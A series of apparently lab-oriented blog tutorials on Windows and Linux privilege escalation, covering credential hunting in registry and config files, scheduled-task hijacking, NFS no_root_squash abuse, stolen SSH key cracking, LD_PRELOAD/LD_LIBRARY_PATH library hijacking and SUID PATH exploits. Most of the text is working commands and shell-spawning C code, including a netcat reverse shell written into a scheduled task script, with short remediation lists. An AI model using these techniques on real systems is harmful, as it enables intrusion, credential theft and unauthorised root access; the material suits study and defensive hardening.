by Vry4n_ | Nov 30, 2023 | Win Priv Esc
Common Commands and searches
Search for hidden files
Search for file names and contents
- dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* == *user*
- findstr /SI “passw pwd” *.xml *.ini *.txt *.ps1 *.bat *.config
- dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
Search for passwords in registry
- reg query HKLM /f password /t REG_SZ /s
- reg query HKLU /f password /t REG_SZ /s
Read the Registry
- reg query “HKLMSOFTWAREMicrosoftWindows NTCurrentversionWinlogon”
- reg query “HKLMSYSTEMCurrentControlSetServicesSNMP”
- reg query “HKCUSoftwareSimonTathamPuTTYSessions”
- reg query “HKCUSoftwareORLWinVNC3Password”
- reg query HKEY_LOCAL_MACHINESOFTWARERealVNCWinVNC4 /v password
- reg query “HKCUSoftwareORLWinVNC3Password”
- reg query “HKCUSoftwareTightVNCServer”
- reg query “HKCUSoftwareOpenSSHAgentKeys”
Hunting for SAM and SYSTEM Backups
Check permissions
- icacls “C:WindowsSystem32ConfigRegback”
Interesting locations
- C:Windowssysprepsysprep.xml
- C:Windowssysprepsysprep.inf
- C:Windowssysprep.inf
- C:WindowsPantherUnattended.xml
- C:WindowsPantherUnattend.xml
- C:WindowsPantherUnattendUnattend.xml
- C:WindowsPantherUnattendUnattended.xml
- C:WindowsSystem32Sysprepunattend.xml
- C:WindowsSystem32Sysprepunattended.xml
- C:unattend.txt
- C:unattend.inf
- setupinfo
- setupinfo.bak
- web.config
- SiteList.xml
- .awscredentials
- .azureaccessTokens.json
- .azureazureProfile.json
- gcloudcredentials.db
- gcloudlegacy_credentials
- gcloudaccess_tokens.db
Chrome Password
- gc ‘C:UsersuserAppDataLocalGoogleChromeUser DataDefaultCustom Dictionary.txt’ | Select-String password
Unattended Windows Installations
When installing Windows on a large number of hosts, administrators may use Windows Deployment Services, which allows for a single operating system image to be deployed to several hosts through the network. These kinds of installations are referred to as unattended installations as they don’t require user interaction. Such installations require the use of an administrator account to perform the initial setup, which might end up being stored in the machine in the following locations:
- C:Unattend.xml
- C:WindowsPantherUnattend.xml
- C:WindowsPantherUnattendUnattend.xml
- C:Windowssystem32sysprep.inf
- C:Windowssystem32sysprepsysprep.xml
Powershell History
Whenever a user runs a command using Powershell, it gets stored into a file that keeps a memory of past commands. This is useful for repeating commands you have used before quickly. If a user runs a command that includes a password directly as part of the Powershell command line, it can later be retrieved by using the following command from a cmd.exe prompt:
- type %userprofile%AppDataRoamingMicrosoftWindowsPowerShellPSReadlineConsoleHost_history.txt
- type C:UsersbobAppDataRoamingMicrosoftWindowsPowerShellPSReadLineConsoleHost_history.txt
- (Get-PSReadLineOption).HistorySavePath
- gc (Get-PSReadLineOption).HistorySavePath
- foreach($user in ((ls C:users).fullname)){cat “$userAppDataRoamingMicrosoftWindowsPowerShellPSReadlineConsoleHost_history.txt” -ErrorAction SilentlyContinue}
Note: The command above will only work from cmd.exe, as Powershell won’t recognize %userprofile% as an environment variable. To read the file from Powershell, you’d have to replace %userprofile% with $Env:userprofile
Saved Windows Credentials
Windows allows us to use other users’ credentials. This function also gives the option to save these credentials on the system. The command below will list saved credentials:
While you can’t see the actual passwords, if you notice any credentials worth trying, you can use them with the runas command and the /savecred option, as seen below.
- runas /savecred /user:admin cmd.exe
- runas /env /noprofile /savecred /user:DESKTOP-T3I4BBKadministrator “c:tempnc.exe 443 -e cmd.exe”
IIS Configuration
Internet Information Services (IIS) is the default web server on Windows installations. The configuration of websites on IIS is stored in a file called web.config and can store passwords for databases or configured authentication mechanisms. Depending on the installed version of IIS, we can find web.config in one of the following locations:
- C:inetpubwwwrootweb.config
- C:WindowsMicrosoft.NETFramework64v4.0.30319Configweb.config
Here is a quick way to find database connection strings on the file:
- type C:WindowsMicrosoft.NETFramework64v4.0.30319Configweb.config | findstr connectionString
Retrieve Credentials from Software: PuTTY
PuTTY is an SSH client commonly found on Windows systems. Instead of having to specify a connection’s parameters every single time, users can store sessions where the IP, user and other configurations can be stored for later use. While PuTTY won’t allow users to store their SSH password, it will store proxy configurations that include cleartext authentication credentials.
To retrieve the stored proxy credentials, you can search under the following registry key for ProxyPassword with the following command:
- reg query HKEY_CURRENT_USERSoftwareSimonTathamPuTTYSessions /f “Proxy” /s
by Vry4n_ | Nov 30, 2023 | Win Priv Esc
we will be exploring vulnerable scheduled tasks; this time has to do with weak folder permissions.
Enumerate Scheduled tasks
1. Search for tasks
- schtasks /query /fo LIST /v | findstr /B /C:”Folder” /C:”TaskName” /C:”Run As User” /C:”Schedule” /C:”Scheduled Task State” /C:”Schedule Type” /C:”Repeat: Every” /C:”Comment”
- schtasks /query /fo LIST /v
- schtasks /query /tn <TASKNAME> /fo list /v
- schtasks /query /fo TABLE /nh | findstr /v /i “disable deshab”
- schtasks /query /fo LIST 2>nul | findstr TaskName
- schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep “SYSTEM\|Task To Run” | grep -B 1 SYSTEM

- Get-ScheduledTask
- Get-ScheduledTask | ft TaskName,TaskPath,State
- Get-ScheduledTask | where {$_.TaskPath -notlike “\Microsoft*”} | ft TaskName,TaskPath,State

“Task to Run” parameter which indicates what gets executed by the scheduled task
“Run As User” parameter, which shows the user that will be used to execute the task.
2. Check If our current user can modify or overwrite the “Task to Run” executable, we can control what gets executed by the taskusr1 user, resulting in a simple privilege escalation. To check the file permissions on the executable, we use icacls:
- icacls c:\tasks\schtask.bat

Note: As can be seen in the result, the BUILTIN\Users group has full access (F) over the task’s binary. This means we can modify the .bat file and insert any payload we like.
The permissions we are looking for on the file/folder are any one of the following three permissions:
- (F) Full Control
- (M) Modify
- (W) Write
3. Interesting locations Start-Up folder
- dir /b “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” 2>nul
- dir /b “C:\Documents and Settings\%username%\Start Menu\Programs\Startup” 2>nul
- dir /b “%programdata%\Microsoft\Windows\Start Menu\Programs\Startup” 2>nul
- dir /b “%appdata%\Microsoft\Windows\Start Menu\Programs\Startup” 2>nul
- Get-ChildItem “C:\Users\All Users\Start Menu\Programs\Startup”
- Get-ChildItem “C:\Users\$env:USERNAME\Start Menu\Programs\Startup”
Exploitation (Weak Permissions) Reverse shell
1. Knowing our user has rights to modify the program, we can transfer a netcat for windows program, and name the command with the permissions “Run as User” has. (
- iwr -OutFile nc.exe
2. Having the program in the target machine, we can proceed to create a new file that will execute instead, we have to name it the same as in the schedule task
- echo C:\tasks\nc.exe -e cmd.exe 4444 > C:\tasks\schtask.bat
Note: Make sure the file that will be executed, is in a directory that the scheduled task user can access and execute
3. You have to wait for the tasks to execute. Check your listener in your local machine

- Tools such as Sysinternals Autoruns can detect system changes like showing presently scheduled jobs.
- Tools like TCPView & Process Explore may help to identify remote connections for suspicious services or processes.
- View Task Properties and History: To view a task’s properties and history by using a command line
- Perform an audit scan to find out week or misconfiguration with the help of automated script using tools such as WinPeas, SharpUp, etc. Read more from here “Window Privilege Escalation: Automated Script”.
- Make sure the scheduled task should not be run as SYSTEM.
by Vry4n_ | Nov 18, 2023 | Privilege Escalation

NFS or “Network File Sharing” is a protocol that runs on port 2049 and consists of two components, the server and the client(s). Shared directories are created on the NFS server component so that they can be shared with other Linux clients over a network. Permitted users can add files to the share, which are then shared with other users who have access to the directory.
What is NFS Squash?
Network File System (NFS) Squashing, also known as Root Squashing, is a security feature implemented in NFS servers to restrict the privileges of remote users, especially the root user (uid 0), when accessing NFS-exported directories. When root squashing is enabled, the root user on the client system is mapped to an unprivileged user on the NFS server, typically ‘nobody’ or ‘nfsnobody.’
The primary goal of NFS Squashing is to enhance security by preventing remote root users from having unrestricted access to NFS-exported file systems. Without squashing, a compromised or malicious remote root user could potentially modify or delete any file on the NFS server, posing significant security risks.
- no_root_squash: This option basically gives authority to the root user on the client to access files on the NFS server as root. And this can lead to serious security implications.
- no_all_squash: This is similar to no_root_squash option but applies to non-root users. Imagine, you have a shell as nobody user; checked /etc/exports file; no_all_squash option is present; check /etc/passwd file; emulate a non-root user; create a suid file as that user (by mounting using nfs). Execute the suid as nobody user and become different user.
Vulnerabilities and Misconfigurations:
1. Misconfiguration of NFS Export Options:
- A common misconfiguration involves not enabling root squashing explicitly. If the NFS export options do not include ‘root_squash,’ the NFS server may allow remote root users to access and modify files with full root privileges.
2. Insecure Network Configurations:
- If NFS traffic is transmitted over an insecure network without proper encryption or authentication mechanisms, attackers could potentially intercept and manipulate NFS requests to exploit root squashing vulnerabilities.
1. Identify the NFS port

2. Enumerate further
- nmap -A -sV -sC -T4

Note: So the port for NFS shares is 2049, but we are also very interested in port 111 because that is the rpc port that the NFS share will bind to. This output reveals the version of NSF also.
3. Enumerate using Nmap scripts
- nmap -p 111,2049 –script=nfs-*

Note: the permissions on (., ..) RWX show we have full access. The NoExecute flag is also set, so we won’t be able to execute any binaries or scripts in the share.
4. Identify the mount folders available
- showmount -e
- showmount –all

Note: The * means all networks allowed
Local enumeration
1. Read the /etc/exports file, if you find some directory that is configured as no_root_squash, then you can access it from as a client and write inside that directory as if you were the local root of the machine.

- rw: This option gives the client computer both read and write access to the volume.
- sync: This option forces NFS to write changes to disk before replying. This results in a more stable and consistent environment but reduces the speed of file operations.
- inescure: This option allows clients to use any port to access NFS shares.
- no_subtree_check: This option prevents subtree checking, which is a process where the host must check whether the file is actually still available in the exported tree for every request.
- no_root_squash: This option allows privileged file writes inside the share. By default, NFS translates requests from a root user remotely into a non-privileged user on the server.
1. LinPEAS can also alert us about NFS Squash

1. create a mount point on your local machine and mount the share
- mkdir /tmp/nfs
- mount -o rw,vers=3 /tmp/nfs

2. Verify the NFS partition was mounted
- mount -t nfs
- cd /tmp/nfs
- ls -la

3. Generate a payload, this time I’ll be using msfvenom, and save it to the mounted share (this payload simply calls /bin/bash), this file MUST have the owner as root
- msfvenom -p linux/x86/exec CMD=”/bin/bash -p” -f elf -o /tmp/nfs/shell.elf
4. make the file executable and set the SUID permission:
- chmod +xs /tmp/nfs/shell.elf

5. From the local session in the target machine run this file from the NFS shared folder, which inherited the permissions our local mahine’s root permissions, it will run it as the remote machine local root
- cd /tmp
- ls -l
- ./shell.elf

6. Verify which user ran this new shell

Extra 1: Copying /bin/bash for a Root Shell
1. Alternatively you could have copied /bin/bash from you local machine to NFS shared folder, and assign the sticky bit
- cp /bin/bash /tmp/nfs
- chmod +xs bash
- ls -l

2. Again, in the target machine, run the executable
Extra 2: Crafting an Exploit for a Root Shell
1. To craft our custom exploit that will drop us into a root shell, we can use the following commands, to create a c file, compile it
- echo ‘int main() { setgid(0); setuid(0); system(“/bin/bash -p”); return 0; }’ > /mnt/share/root_shell.c
- gcc ./root_shell.c -o ./root_shell
- ls -l

2. Assign proper permissions
- chmod +s root_shell
- ls -l

3. Now run it from the remote machine session
Port Forwarding the NFS Share
1. When accessing the NFS share externally root_squash enabled and we cannot perform privileged file writes. However, we can access the file share from localhost, we can perform privileged file writes on the NFS server.
Since we know the NFS share runs on port 2049, and we also know that the user has access to the system through SSH, then the easiest way to forward this port out to our attacker machine is by performing local port forwarding.
- ssh -N -L user@
- ssh -N -L user@ -oHostKeyAlgorithms=+ssh-rsa

Note: This says… Do not execute any commands on the remote host (-N) and perform local port forwarding (-L). Bind port 2049 to on our attacker machine from port 2049 running on on the target machine. Lastly, we are logging in using juggernaut to perform this action for us.
2. Seeing the prompt hang indicates that the port forwarding was successful; and when we open a new tab on our attacker machine and run the netstat -tulpn command, we should see port 2049 open locally.

3. With the NFS server open to us locally, we can mount it just like we did earlier except we just need to adjust the command to mount the share locally instead of externally, this will look something like this:
- mount -t nfs -o port=2049 /tmp/nfs
4. To confirm that we can perform privileged writes in the share, we can navigate to the mounting point on our attacker machine and create a test file, just the same as we did when we mounted the share the first time.
Note: The permissions should be the ones from the attacker machine. This means we can either create a malicious binary or do something a bit more simple like… copy /bin/bash into the share, set root:root ownership and SUID permissions on it, and then SSH back into the victim and execute it with user to elevate our privileges to root!
Remediation Steps:
1. Enable Root Squashing:
- Always enable root squashing on NFS servers to ensure that remote root users are mapped to unprivileged users.
2. Secure Network Configurations:
- Use secure network configurations, such as encrypting NFS traffic with technologies like IPsec or configuring NFS over a Virtual Private Network (VPN).
3. Regular Auditing and Monitoring:
- Implement regular audits and monitoring of NFS server logs to detect any unauthorized access or suspicious activities.
4. Limit Access:
- Restrict access to NFS exports by specifying specific IP addresses or networks that are allowed to mount the file systems.
5. Keep Software Updated:
- Ensure that both the NFS server and client software are kept up to date with the latest security patches to mitigate known vulnerabilities.
6. Use NFSv4:
- Consider using NFS version 4, which includes improved security features compared to older versions.
by Vry4n_ | Nov 18, 2023 | Privilege Escalation

SSH keys, or Secure Shell keys, are cryptographic keys used for secure communication over an unsecured network. They provide a secure method for authentication between a client and a server, allowing users to access and manage remote systems securely.
Security Risks:
Key Theft:
- If an unauthorized person gains access to your private SSH key, they can impersonate you and gain unauthorized access to systems you have access to.
Weak Key Generation:
- Poorly generated keys may be susceptible to brute-force attacks. It’s crucial to use a strong, random key generation process.
Key Spoofing:
- Attackers might attempt to intercept or manipulate the communication to present a false public key, leading to potential security breaches.
Unauthorized Key Access:
- If an attacker gains access to an authorized user’s public key, they can add it to their own authorized_keys file and gain access to systems.
Key Exposure:
- Storing private keys on insecure devices or sharing them improperly increases the risk of exposure.
Example of User & key creation
User Creation
1. Use the following command to add a new user (replace username with the desired username):
The -m option ensures that a home directory is created for the user.
2. Set a password for the new user:
Follow the prompts to enter and confirm the password.

RSA SSH keys creation
1. Now, you can add an RSA SSH certificate for the user. You can do this by creating a .ssh directory in the user’s home directory and adding an authorized_keys file to it.
- mkdir -p /home/user1/.ssh
- touch /home/user1/.ssh/authorized_keys

2. Set the appropriate permissions for the .ssh directory and the authorized_keys file:
- chmod 700 /home/user1/.ssh
- chmod 600 /home/user1/.ssh/authorized_keys
- (OPTIONAL) chown -R username:username /home/username/.ssh

3. Generate the key pair. This command will create a new RSA key pair (private and public keys) in the default location (~/.ssh/id_rsa for the private key and ~/.ssh/ for the public key).
- ssh-keygen -t rsa -b 2048

4. Add this keys, to the authorized_keys file
- ssh-copy-id username@hostname
- ssh-copy-id user1@Vk9-Security

Identifying keys
1. You can search for files that are readable, and contain the word “PRIVATE KEY”, then list the file. You can set up the starting point where you want
- find / -type f -readable -exec grep -q “PRIVATE KEY” {} \; -exec sh -c ‘ls -l “$1″‘ sh {} \; 2> /dev/null
- find /home -type f -readable -exec grep -q “PRIVATE KEY” {} \; -exec sh -c ‘ls -l “$1″‘ sh {} \; 2> /dev/null

1. You can also, find some keys that can be read in .ssh files

Exploiting READ permission (Without password)
1. Sometimes users make backups of important files but fail to secure them with the correct permissions, or even, the original files were not secured properly, allowing other users to read the contents of SSH keys.

2. You can copy the contents of this file into your computer, and assign the permissions 600 using chmod command
- vi id_rsa
- chmod 600 id_rsa
- ls -l
- cat id_rsa

3. Using file we can make sure if this a private key, also the line “BEGIN RSA PRIVATE KEY” says it all

4. (OPTIONAL) This key seems to be encoded in base64 format, so we try to decoded, sometimes we can find the user this key belongs to
- echo “””<key>””” | base64 -d

Note: This screenshot is from another example
5. Now, Knowing the user this belongs to, we can try to use this key to authenticate
- ssh -i id_rsa root@
- ssh -i id_rsa -oPubkeyAcceptedKeyTypes=+ssh-rsa -oHostKeyAlgorithms=+ssh-rsa root@

Note: I had to use (-oPubkeyAcceptedKeyTypes=+ssh-rsa -oHostKeyAlgorithms=+ssh-rsa) because this server was not accepting the authentication offer
Exploiting READ permission (password protected)
1. Same steps a before, just when you try to use the certificate, SSH will ask for the private key password, which we don’t know
- ssh user1@ -i id_rsa

2. We need to crack the private key password, for this we can use ssh2john, to prepare the file to be cracked by john
- ssh2john id_rsa > new_id_rsa
- cat new_id_rsa

3. Now using john, we can crack the password
- john –wordlist=/usr/share/wordlists/rockyou.txt new_id_rsa

Note: So here we have our password
4. Now we can try this password when SSH asks for the key pass phrase
- ssh user1@ -i id_rsa

5. (OPTIONAL) Doing again the decode with base64 string we can have an idea of what type of encryption is used
- echo “””<key>””” | base64 -d

Key Management:
- Regularly audit and manage SSH keys. Remove unused or unnecessary keys from authorized_keys files.
Strong Key Generation:
- Use robust, industry-standard algorithms like RSA or ECDSA and ensure sufficiently long key lengths.
Passphrase Protection:
- Assign passphrases to private keys to add an extra layer of security. This passphrase encrypts the private key and must be entered before the key can be used.
Key Rotation:
- Periodically rotate SSH keys, especially if someone with access leaves the team or if there’s a suspicion of compromise.
Limiting Key Access:
- Restrict the use of keys to specific IP addresses, commands, or users through the SSH configuration.
Multi-Factor Authentication (MFA):
- Combine SSH key authentication with MFA to add an extra layer of security.
Secure Storage:
- Store private keys securely, using hardware tokens or encrypted containers.
Regular Audits:
- Conduct regular security audits to identify and rectify any vulnerabilities.
- Implement logging and monitoring to detect and respond to suspicious activities.
by Vry4n_ | Nov 14, 2023 | Privilege Escalation
The sudo command in Unix-based systems allows specified users to execute commands as another user, typically the superuser (root). When used incorrectly or in conjunction with environment variables like LD_PRELOAD and LD_LIBRARY_PATH, it can introduce security vulnerabilities.
Environment Variables and sudo Vulnerabilities:
LD_PRELOAD: This variable specifies a list of additional dynamic libraries to be loaded before all others. It can be exploited to load a shared library into the memory space of the running process, potentially altering its behavior.
- Manipulating LD_PRELOAD to load a malicious library before the standard libraries, allowing for code injection or alteration of program behavior.
LD_LIBRARY_PATH: It defines a search path for shared libraries. If manipulated, it can force the system to load malicious libraries from unintended locations.
- Modifying LD_LIBRARY_PATH to load unauthorized or malicious libraries before the legitimate ones, enabling unauthorized code execution.
LD_PRELOAD loads a shared object before any others when a program is run. LD_LIBRARY_PATH provides a list of directories where shared libraries are searched for first.
Example of a misconfigured sudoers

env_reset: This option resets the environment to a default, secure state before executing a command using sudo. It clears the environment variables that might pose a security risk or influence command behavior in an unintended way.
env_keep+=LD_PRELOAD: This part instructs sudo to preserve the LD_PRELOAD environment variable from being reset. The += means to add to the list of preserved variables. LD_PRELOAD allows the preloading of shared libraries before other libraries, which could potentially be exploited for malicious purposes. By keeping this variable, it remains unchanged when sudo resets the rest of the environment.
env_keep+=LD_LIBRARY_PATH: Similar to LD_PRELOAD, this line also tells sudo to preserve the LD_LIBRARY_PATH environment variable. LD_LIBRARY_PATH specifies additional paths to search for shared libraries. Preserving it could be useful in certain scenarios where specific libraries need to be located.
This is how a default sudoers looks like

1. To identify if LD_PRELOAD or LD_LIBRARY_PATH have been enabled, we can run

Note: We can also read /etc/sudoers, but that is usually restricted
1. Using we can enumerate sudo -l as well (

Exploitation: LD_PRELOAD
1. When a program is running, LD_PRELOAD loads a shared object before any others. By writing a simple script with init() function, it will help us execute code as soon as the object is loaded.
2. Create a new shared object
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
system("/bin/bash -p");

3. Compile the code
- gcc -fPIC -shared -nostartfiles -o /tmp/ preload.c
- ls -l preload*

3. Run one of the programs you are allowed to run via sudo (listed when running sudo -l), while setting the LD_PRELOAD environment variable to the full path of the new shared object( sudo LD_PRELOAD=/tmp/ program-name-here)
- sudo -l
- sudo LD_PRELOAD=/tmp/ /usr/bin/man
- whoami && id

4. Now you are root!
Exploitation: LD_LIBRARY_PATH
1. The LD_LIBRARY_PATH contains a list of directories which search for shared libraries first. You must test each of the shared libraries to know which one is vulnerable
- sudo -l
- ldd /usr/sbin/iftop

2. Use one of the shared objects in the list and we will hijack it by creating a file with same name. For this demonstration, we will be targeting the (/lib/ file.
- vi library_path.c
- cat library_path.c
#include <stdio.h>
#include <stdlib.h>
static void hijack() __attribute__((constructor));
void hijack() {
system("/bin/bash -p");

3. Create a shared object with the same name as one of the listed libraries
- gcc -o /tmp/ -shared -fPIC /tmp/library_path.c
- ls -l lib*

4. Run one of the programs you are allowed to run via sudo (listed when running sudo -l), while setting the LD_LIBRARY_PATH environment variable to the full path of the new shared object( sudo LD_LIBRARY_PATH=/tmp/ program-name-here)
- sudo LD_LIBRARY_PATH=/tmp /usr/sbin/iftop
- whoami && id

5. Now you are root!
1. Try renaming /tmp/ to the name of another library used by the program and re-run it using sudo again. Did it work? If not, try to figure out why not, and how the library_path.c code could be changed to make it work.
- Restrict Environment Variables: Within the sudo configuration, limit or explicitly deny the preservation of critical environment variables like LD_PRELOAD and LD_LIBRARY_PATH.
- Use Defaults: Set the env_reset option in the sudoers file to reset the environment to a default state, clearing potentially dangerous variables.
- Whitelist Approved Paths: If necessary, specify approved paths within the sudoers file where LD_LIBRARY_PATH can be used.
- Update sudo Configuration: Regularly review and update the sudo configuration to reflect the least privilege principle and remove unnecessary permissions.
by Vry4n_ | Nov 13, 2023 | Privilege Escalation
SUID (Set User ID) and SGID (Set Group ID) are permissions in Unix-based systems that allow users to execute a file with the permissions of the file owner or group, respectively. When these permissions are set on executables and combined with environment variables, it can lead to potential security vulnerabilities if not managed properly.
Environment variables, like PATH, LD_LIBRARY_PATH, or PYTHONPATH, can be manipulated by attackers to potentially influence the behavior of SUID/SGID executables. If an SUID/SGID binary relies on environment variables to locate libraries, binaries, or configurations, an attacker can manipulate these variables to control the behavior of the executable.
If a program is attempting to execute programs without specifying an absolute path, we could modify the $PATH variables, to direct the program to our own script or binary.
1. To hunt for all SUID binaries on the system
- find / -type f -perm -4000 2>/dev/null
- find / -type f -perm -u=s 2>/dev/null

1. You can also search for specific user SUID
- find / -type f -perm -4000 -user root -ls 2>/dev/null
- find / -type f -perm -u=s -user root -ls 2>/dev/null

1. You can search for both at the same time
- find / \( -perm -4000 -o -perm -2000 \) -type f -exec ls -la {} \; 2> /dev/null
- find / \( -perm -g=s -o -perm -u=s \) -type f -exec ls -la {} \; 2> /dev/null

1. Using we can enumerate SUID and SGID
- Transfer the script into the target machine
- Run it: ./

1. Enumerate SUID using script (, we’ll take a look at /usr/local/bin/suid-so

Exploitation #1
1. In our case, we see some interesting SUID/SGID set files. I will test suid-env against this vulnerability. We can review this code, to try to find any program being called without specifying the absolute path
- strings /usr/local/bin/suid-env

Note: In our case, we found this program trying to execute apache2, One line (“service apache2 start”) suggests that the service executable is being called to start the webserver, however the full path of the executable (/usr/sbin/service) is not being used.
2. Create a code that spawns a shell, in any writable directory, and call it as service, then compile it
int main() {
system("/bin/bash -p");

- vi service.c
- cat service.c
- gcc -o service service.c
- ls -l service*
3. Prepend the current directory (or where the new service executable is located) to the PATH variable, and run the suid-env executable to gain a root shell
- echo $PATH
- pwd
- export PATH=/home/user:$PATH
- cat $PATH

Note: You can also run, not to change the environment variable
- PATH=.:$PATH /usr/local/bin/suid-env
4. Execute the program, you should have a new shell as root
- /usr/local/bin/suid-env
- whoami && id

Exploitation #2 (absolute path)
1. The /usr/local/bin/suid-env2 executable is identical to /usr/local/bin/suid-env except that it uses the absolute path of the service executable (/usr/sbin/service) to start the apache2 webserver.
- strings /usr/local/bin/suid-env2

2. In Bash versions <4.2-048 it is possible to define shell functions with names that resemble file paths, then export those functions so that they are used instead of any actual executable at that file path.

3. Create a Bash function with the name “/usr/sbin/service” that executes a new Bash shell (using -p so permissions are preserved) and export the function, then run the program
- function /usr/sbin/service { /bin/bash -p; }
- export -f /usr/sbin/service
- /usr/local/bin/suid-env2
- Whoami && id

Exploitation #3
1. This will not work on Bash versions 4.4 and above. When in debugging mode, Bash uses the environment variable PS4 to display an extra prompt for debugging statements.

2. Run the /usr/local/bin/suid-env2 executable with bash debugging enabled and the PS4 variable set to an embedded command which creates an SUID version of /bin/bash:
- env -i SHELLOPTS=xtrace PS4=’$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)’ /usr/local/bin/suid-env2

Note: this command will copy /bin/bash as root, copy it to /tmp as rootbash, and then, set it as sticky bit
3. Now make sure the rootbash file was created, and then run it
- ls -l /tmp
- /tmp/rootbash
- whoami && id

- Limit Environment Variable Usage: Minimize the reliance of SUID/SGID executables on environment variables whenever possible.
- Hardcode Paths: Instead of relying on environmental variables, specify full paths to necessary binaries, libraries, and configurations within the code of the executable.
- Restricted Environment: Implement a restricted environment for the execution of SUID/SGID executables to control and sanitize the environment variables available to them.
- Code Review: Analyze the code of SUID/SGID executables to understand their reliance on environment variables.
- Static Analysis Tools: Use tools that scan code for potential vulnerabilities related to environment variables.
- Runtime Monitoring: Monitor the behavior of SUID/SGID executables for any unexpected or unauthorized actions.